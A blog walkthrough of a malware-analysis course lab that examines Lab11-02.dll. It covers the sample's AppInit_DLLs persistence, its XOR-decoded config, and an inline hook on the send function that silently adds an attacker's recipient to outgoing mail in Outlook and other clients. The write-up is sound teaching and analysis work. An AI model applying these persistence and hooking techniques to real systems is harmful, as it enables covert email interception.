Tools Used

  1. IDA Pro
  2. Procmon
  3. Ollydbg
  4. Wireshark


  1. Lab11-02.dllSHA256: df899256c4a9fc0e550c62b84ab9cb8acd8d18683f0a41c98ba83f0487d4766e


  • Detection Rate: 8/54
  • Analyzed on 2016-03-11
  • Compilation Date: 2011-11-06 21:50:12
  • View report here

Lab 11-2
Analyze the malware found in Lab11-02.dll. Assume that a suspicious file
named Lab11-02.ini was also found with this malware.
1. What are the exports for this DLL malware?

Figure 1. Exports

2. What happens after you attempt to install this malware using

Figure 2. Set Registry & WriteFile

The malware add a registry value in HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\AppInit_DLLS.

It then copy itself; the dll as C:\Windows\System32\spoolvxx32.dll.

The malware then tries to open C:\Windows\System32\Lab11-02.ini.

3. Where must Lab11-02.ini reside in order for the malware to install

Figure 3. Loads config file

The malware will attempt to load the config from C:\Windows\System32\Lab11-02.ini. We would need to place the ini file in system32 folder.

4. How is this malware installed for persistence?

According to MSDN, AppInit_DLLs is a mechanism that allows an arbitrary list of DLLs to be loaded into each user mode process on the system. By adding AppInit_DLLs in HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\\ we are loading the malicious DLL into each user mode process that gets executed on the system.

5. What user-space rootkit technique does this malware employ?

If we look at the subroutine @0x100012A3, you will see that it is attempting to get the address of send from wscock32.dll. It then pass the address to subroutine @0x10001203.

The subroutine @0x10001203 is employing the inline hook technique. It first get the offset from the hook position to the function where it wants to jump to. It then uses VirtualProtect to make 5 bytes of space from the start of the subroutine address to PAGE_EXECUTE_READWRITE. Once it is done it then rewrite the code to jmp to the hook function. Finally it reset the 5 bytes of memory space back to the old protection attributes.

Figure 4. inline hook

However, the malware only hook 3 programs; THEBAT.EXE, OUTLOOK.EXE, MSIMM.EXE. 

Figure 5. Hook selected programs

To conclude, the malware is attempting to do an inline hook on wsock32.dll’s send function for selected programs.


6. What does the hooking code do?

We first look at what the malware is retrieving from the config file.

Figure 6. Decoding config

After reading the data from the config file, the malware then decode it by calling the subroutine @0x100016CA. If we dive into this subroutine, you will realize that it is a xor decoding function. Let’s place a hook there in ollydbg to see what comes out.

Figure 7.

This decoded string will be use in the following function.

Figure 8. replacing send data

The inline hook jumps to the above function. Its starts off with checking if the send buffer contains the string “RCPT TO”. If it does, it will create a new buffer “RCPT TO:<>\r\n” and send it off via the original send function. The function will then end of by simply forwarding the original data to the send function.

7. Which process(es) does this malware attack and why?

As answered in quetsion 5… the malware only hook 3 programs; THEBAT.EXE, OUTLOOK.EXE, MSIMM.EXE. They are all email clients.

8. What is the significance of the .ini file?

As answered in question 5… the config.ini contains the encoded attacker email address. It is use to replace recipient address causing email to be send to the attacker instead.

9. How can you dynamically capture this malware’s activity with Wireshark?

Set up inetsim and just send an email from outlook express after installing the malware.

Figure 9. Wireshark



Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s